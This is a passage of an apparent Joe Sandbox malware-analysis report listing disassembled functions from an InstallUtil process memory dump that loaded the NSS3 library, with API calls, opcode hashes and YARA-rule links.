                                                                                                                  • API String ID: 632333372-2974027950
                                                                                                                  • Opcode ID: 782707c08411223f8ac30d1062ea3cacff129265391dfe906f2ccd47baadf24d
                                                                                                                  • Instruction ID: bb3cbcc893e581062475ab180b28e369e33ef2f5b8b60af9b8b163a630a6f0b8
                                                                                                                  • Opcode Fuzzy Hash: 782707c08411223f8ac30d1062ea3cacff129265391dfe906f2ccd47baadf24d
                                                                                                                  • Instruction Fuzzy Hash: 2EF0E219F459286BF73050299F1CF8637864B91339F494CA2EA0E6BF92D20D9CE052F1
                                                                                                                  Function 6C790C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PR_SetError.NSS3(00000000,00000000,6C791444,?,00000001,?,00000000,00000000,?,?,6C791444,?,?,00000000,?,?), ref: 6C790CB3
                                                                                                                    • Part of subcall function 6C7FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7FC2BF
                                                                                                                  • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C791444,?,00000001,?,00000000,00000000,?,?,6C791444,?), ref: 6C790DC1
                                                                                                                  • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C791444,?,00000001,?,00000000,00000000,?,?,6C791444,?), ref: 6C790DEC
                                                                                                                    • Part of subcall function 6C7B0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C752AF5,?,?,?,?,?,6C750A1B,00000000), ref: 6C7B0F1A
                                                                                                                    • Part of subcall function 6C7B0F10: malloc.MOZGLUE(00000001), ref: 6C7B0F30
                                                                                                                    • Part of subcall function 6C7B0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C7B0F42
                                                                                                                  • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C791444,?,00000001,?,00000000,00000000,?), ref: 6C790DFF
                                                                                                                  • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C791444,?,00000001,?,00000000), ref: 6C790E16
                                                                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C791444,?,00000001,?,00000000,00000000,?), ref: 6C790E53
                                                                                                                  • PR_GetCurrentThread.NSS3(?,?,?,?,6C791444,?,00000001,?,00000000,00000000,?,?,6C791444,?,?,00000000), ref: 6C790E65
                                                                                                                  • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C791444,?,00000001,?,00000000,00000000,?), ref: 6C790E79
                                                                                                                    • Part of subcall function 6C7A1560: TlsGetValue.KERNEL32(00000000,?,6C770844,?), ref: 6C7A157A
                                                                                                                    • Part of subcall function 6C7A1560: EnterCriticalSection.KERNEL32(?,?,?,6C770844,?), ref: 6C7A158F
                                                                                                                    • Part of subcall function 6C7A1560: PR_Unlock.NSS3(?,?,?,?,6C770844,?), ref: 6C7A15B2
                                                                                                                    • Part of subcall function 6C76B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C771397,00000000,?,6C76CF93,5B5F5EC0,00000000,?,6C771397,?), ref: 6C76B1CB
                                                                                                                    • Part of subcall function 6C76B1A0: free.MOZGLUE(5B5F5EC0,?,6C76CF93,5B5F5EC0,00000000,?,6C771397,?), ref: 6C76B1D2
                                                                                                                    • Part of subcall function 6C7689E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C7688AE,-00000008), ref: 6C768A04
                                                                                                                    • Part of subcall function 6C7689E0: EnterCriticalSection.KERNEL32(?), ref: 6C768A15
                                                                                                                    • Part of subcall function 6C7689E0: memset.VCRUNTIME140(6C7688AE,00000000,00000132), ref: 6C768A27
                                                                                                                    • Part of subcall function 6C7689E0: PR_Unlock.NSS3(?), ref: 6C768A35
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1601681851-0
                                                                                                                  • Opcode ID: a3b5ada12c99f6a28b29e6bc1d474bfd47663eccddfe96a6ec5e8aabc6accfb8
                                                                                                                  • Instruction ID: 9ea3eccc7d25472b98c480e073058ccd22679e9a716c6575b167cd626371f165
                                                                                                                  • Opcode Fuzzy Hash: a3b5ada12c99f6a28b29e6bc1d474bfd47663eccddfe96a6ec5e8aabc6accfb8
                                                                                                                  • Instruction Fuzzy Hash: 9251C8B5D102059FEB109F64EE89AAB37A8DF09218F150474EC1997B12FB31ED1587A2
                                                                                                                  Function 6C746E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • sqlite3_value_text.NSS3(?,?), ref: 6C746ED8
                                                                                                                  • sqlite3_value_text.NSS3(?,?), ref: 6C746EE5
                                                                                                                  • memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C746FA8
                                                                                                                  • sqlite3_value_text.NSS3(00000000,?), ref: 6C746FDB
                                                                                                                  • sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C746FF0
                                                                                                                  • sqlite3_value_blob.NSS3(?,?), ref: 6C747010
                                                                                                                  • sqlite3_value_blob.NSS3(?,?), ref: 6C74701D
                                                                                                                  • sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C747052
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1920323672-0
                                                                                                                  • Opcode ID: a0c2e0bdd7dddf83a238a0aed962e70426d7e400f5fe53c6dbd1f27c32be4e6d
                                                                                                                  • Instruction ID: d93d688fef4d49a9b671fad1dc892f49af37e2317f5c17abb9b0daa8d2c25f52
                                                                                                                  • Opcode Fuzzy Hash: a0c2e0bdd7dddf83a238a0aed962e70426d7e400f5fe53c6dbd1f27c32be4e6d
                                                                                                                  • Instruction Fuzzy Hash: C66105B1E152068FDB00CF68DA047EEB7B2BF85308F288575D454ABB51E7319E05CB90
                                                                                                                  Function 6C7B8F80 Relevance: 12.2, APIs: 8, Instructions: 158memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6C7B7313), ref: 6C7B8FBB
                                                                                                                    • Part of subcall function 6C7B07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C758298,?,?,?,6C74FCE5,?), ref: 6C7B07BF
                                                                                                                    • Part of subcall function 6C7B07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7B07E6
                                                                                                                    • Part of subcall function 6C7B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7B081B
                                                                                                                    • Part of subcall function 6C7B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7B0825
                                                                                                                  • SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6C7B7313), ref: 6C7B9012
                                                                                                                  • SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6C7B7313), ref: 6C7B903C
                                                                                                                  • SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6C7B7313), ref: 6C7B909E
                                                                                                                  • PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6C7B7313), ref: 6C7B90DB
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6C7B7313), ref: 6C7B90F1
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B10F3
                                                                                                                    • Part of subcall function 6C7B10C0: EnterCriticalSection.KERNEL32(?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B110C
                                                                                                                    • Part of subcall function 6C7B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1141
                                                                                                                    • Part of subcall function 6C7B10C0: PR_Unlock.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1182
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B119C
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6C7B7313), ref: 6C7B906B
                                                                                                                    • Part of subcall function 6C7FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7FC2BF
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6C7B7313), ref: 6C7B9128
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3590961175-0
                                                                                                                  • Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
                                                                                                                  • Instruction ID: 8d3ba7ed485c4ad7fc1f810c539602002d8cdefbd9ad4b39aaf686a0a6e2c081
                                                                                                                  • Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
                                                                                                                  • Instruction Fuzzy Hash: BB51A571A002069FEB109F6ADE88B66B3F9AF74358F154035E929E7751E731E804CB91
                                                                                                                  Function 6C7A2470 Relevance: 12.1, APIs: 8, Instructions: 141COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(6C7A2D7C,6C779192,?), ref: 6C7A248E
                                                                                                                  • EnterCriticalSection.KERNEL32(02B80138), ref: 6C7A24A2
                                                                                                                  • memset.VCRUNTIME140(6C7A2D7C,00000020,6C7A2D5C), ref: 6C7A250E
                                                                                                                  • memset.VCRUNTIME140(6C7A2D9C,00000020,6C7A2D7C), ref: 6C7A2535
                                                                                                                  • memset.VCRUNTIME140(?,00000020,?), ref: 6C7A255C
                                                                                                                  • memset.VCRUNTIME140(?,00000020,?), ref: 6C7A2583
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C7A2594
                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C7A25AF
                                                                                                                    • Part of subcall function 6C7FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7FC2BF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$Value$CriticalEnterErrorSectionUnlock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2972906980-0
                                                                                                                  • Opcode ID: 43862e766b40b36f9e969b4fa495cb79d1aaadaaf2e9c3db9d7b97ac10f77309
                                                                                                                  • Instruction ID: c8f2941731d56e6ffaab58f0f3f6bae769381518c0afca1b0693e3d9eea47349
                                                                                                                  • Opcode Fuzzy Hash: 43862e766b40b36f9e969b4fa495cb79d1aaadaaf2e9c3db9d7b97ac10f77309
                                                                                                                  • Instruction Fuzzy Hash: E44114B1E002015BEB109FB5CE9C7A93774BB99308F140A78EC09D7A52F770E986C791
                                                                                                                  Function 6C7A05A0 Relevance: 12.1, APIs: 8, Instructions: 127memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PORT_Alloc_Util.NSS3(00000000), ref: 6C7A05DA
                                                                                                                    • Part of subcall function 6C7B0BE0: malloc.MOZGLUE(6C7A8D2D,?,00000000,?), ref: 6C7B0BF8
                                                                                                                    • Part of subcall function 6C7B0BE0: TlsGetValue.KERNEL32(6C7A8D2D,?,00000000,?), ref: 6C7B0C15
                                                                                                                  • TlsGetValue.KERNEL32(00000000), ref: 6C7A060C
                                                                                                                  • EnterCriticalSection.KERNEL32 ref: 6C7A0629
                                                                                                                  • TlsGetValue.KERNEL32(00000000), ref: 6C7A066F
                                                                                                                  • EnterCriticalSection.KERNEL32 ref: 6C7A068C
                                                                                                                  • PR_Unlock.NSS3 ref: 6C7A06AA
                                                                                                                  • PK11_GetNextSafe.NSS3 ref: 6C7A06C3
                                                                                                                  • PR_Unlock.NSS3 ref: 6C7A06F9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$CriticalEnterSectionUnlock$Alloc_K11_NextSafeUtilmalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1593870348-0
                                                                                                                  • Opcode ID: b2d962f5496e2f6862bedfc37dba34e1b562da1e6c61f245d16ca0eacc1dacde
                                                                                                                  • Instruction ID: f608dba32d4cf5de635255de723ff03a775e2b73c92fd0652217b4e4c75b5b04
                                                                                                                  • Opcode Fuzzy Hash: b2d962f5496e2f6862bedfc37dba34e1b562da1e6c61f245d16ca0eacc1dacde
                                                                                                                  • Instruction Fuzzy Hash: FE511CB4A05746CFDB00DFB9C68466ABBF0BF45308F118A39D85A9B711EB30D455CB91
                                                                                                                  Function 6C7988E0 Relevance: 12.1, APIs: 8, Instructions: 112COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7988FC
                                                                                                                    • Part of subcall function 6C7ABE30: SECOID_FindOID_Util.NSS3(6C76311B,00000000,?,6C76311B,?), ref: 6C7ABE44
                                                                                                                  • PORT_NewArena_Util.NSS3(00000800), ref: 6C798913
                                                                                                                    • Part of subcall function 6C7B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7587ED,00000800,6C74EF74,00000000), ref: 6C7B1000
                                                                                                                    • Part of subcall function 6C7B0FF0: PR_NewLock.NSS3(?,00000800,6C74EF74,00000000), ref: 6C7B1016
                                                                                                                    • Part of subcall function 6C7B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7587ED,00000008,?,00000800,6C74EF74,00000000), ref: 6C7B102B
                                                                                                                  • SEC_ASN1DecodeItem_Util.NSS3(00000000,?,6C87D864,?), ref: 6C798947
                                                                                                                    • Part of subcall function 6C7AE200: PR_SetError.NSS3(FFFFE009,00000000), ref: 6C7AE245
                                                                                                                    • Part of subcall function 6C7AE200: PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C7AE254
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C79895B
                                                                                                                  • DER_GetInteger_Util.NSS3(?), ref: 6C798973
                                                                                                                  • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C798982
                                                                                                                  • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C7989EC
                                                                                                                  • PR_SetError.NSS3(FFFFE006,00000000), ref: 6C798A12
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Arena_Tag_$AlgorithmErrorFindFree$ArenaDecodeInitInteger_Item_LockPoolcalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2145430656-0
                                                                                                                  • Opcode ID: 09f9dc317c716dd4f017d1c87bb3133d2b7fe7b079fc7c3327dcb9e3aacb4fa8
                                                                                                                  • Instruction ID: 22747803a7410b7477bdeedb6a1a8a7a63a998cb4c494eae526c37498b0f6398
                                                                                                                  • Opcode Fuzzy Hash: 09f9dc317c716dd4f017d1c87bb3133d2b7fe7b079fc7c3327dcb9e3aacb4fa8
                                                                                                                  • Instruction Fuzzy Hash: 1F316FB2A0860057F72046797F497EA7A959F9133CF240B37D519D7B81FB35C4468293
                                                                                                                  Function 6C860860 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PR_LogFlush.NSS3(00000000,00000000,?,?,6C867AE2,?,?,?,?,?,?,6C86798A), ref: 6C86086C
                                                                                                                    • Part of subcall function 6C860930: EnterCriticalSection.KERNEL32(?,00000000,?,6C860C83), ref: 6C86094F
                                                                                                                    • Part of subcall function 6C860930: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6C860C83), ref: 6C860974
                                                                                                                    • Part of subcall function 6C860930: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C860983
                                                                                                                    • Part of subcall function 6C860930: _PR_MD_UNLOCK.NSS3(?,?,6C860C83), ref: 6C86099F
                                                                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,00000000,?,?,6C867AE2,?,?,?,?,?,?,6C86798A), ref: 6C86087D
                                                                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,6C867AE2,?,?,?,?,?,?,6C86798A), ref: 6C860892
                                                                                                                  • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,6C86798A), ref: 6C8608AA
                                                                                                                  • free.MOZGLUE(?,00000000,00000000,?,?,6C867AE2,?,?,?,?,?,?,6C86798A), ref: 6C8608C7
                                                                                                                  • free.MOZGLUE(?,00000000,00000000,?,?,6C867AE2,?,?,?,?,?,?,6C86798A), ref: 6C8608E9
                                                                                                                  • free.MOZGLUE(?,6C867AE2,?,?,?,?,?,?,6C86798A), ref: 6C8608EF
                                                                                                                  • PR_DestroyLock.NSS3(?,00000000,00000000,?,?,6C867AE2,?,?,?,?,?,?,6C86798A), ref: 6C86090E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free$__acrt_iob_func$CriticalDestroyEnterFlushLockSectionfclosefflushfwrite
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3145526462-0
                                                                                                                  • Opcode ID: c587f425125b179a9d2dd84406382e37ec0228f02f45f25066909e67716d82e2
                                                                                                                  • Instruction ID: aa29daa387f85814a68c53a08fe6b9d0a88de9779252c6c1d5d7d99bb7bac095
                                                                                                                  • Opcode Fuzzy Hash: c587f425125b179a9d2dd84406382e37ec0228f02f45f25066909e67716d82e2
                                                                                                                  • Instruction Fuzzy Hash: 4F1193B1B012514BEF309B99EE4574A3779AB4225CF280534E4068BB41DB32EC04CBDE
                                                                                                                  Function 6C7465D0 Relevance: 10.8, APIs: 4, Strings: 3, Instructions: 261COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C74670B
                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,6C742B2C), ref: 6C74675E
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C74678E
                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,6C742B2C), ref: 6C7467E1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                  • String ID: winClose$winUnmapfile1$winUnmapfile2
                                                                                                                  • API String ID: 3168844106-373099266
                                                                                                                  • Opcode ID: 38a541c3fd1cb0a755ca2b8d22ade258f77d99e4d770bfa1f2aaeced96d8716a
                                                                                                                  • Instruction ID: 229728803e6ece27e574863bcdcae49083be7c2c09de00cabfd7ba3d0e2aa271
                                                                                                                  • Opcode Fuzzy Hash: 38a541c3fd1cb0a755ca2b8d22ade258f77d99e4d770bfa1f2aaeced96d8716a
                                                                                                                  • Instruction Fuzzy Hash: 11A1B135B01210CBDF689FA5EA9962D3774FF86709B04843CE906CBB51DB349A42CBD6
                                                                                                                  Function 6C6D4F60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 211stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6D4FC4
                                                                                                                  • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6D51BB
                                                                                                                  Strings
                                                                                                                  • unable to delete/modify user-function due to active statements, xrefs: 6C6D51DF
                                                                                                                  • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6D51A5
                                                                                                                  • %s at line %d of [%.10s], xrefs: 6C6D51B4
                                                                                                                  • misuse, xrefs: 6C6D51AF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
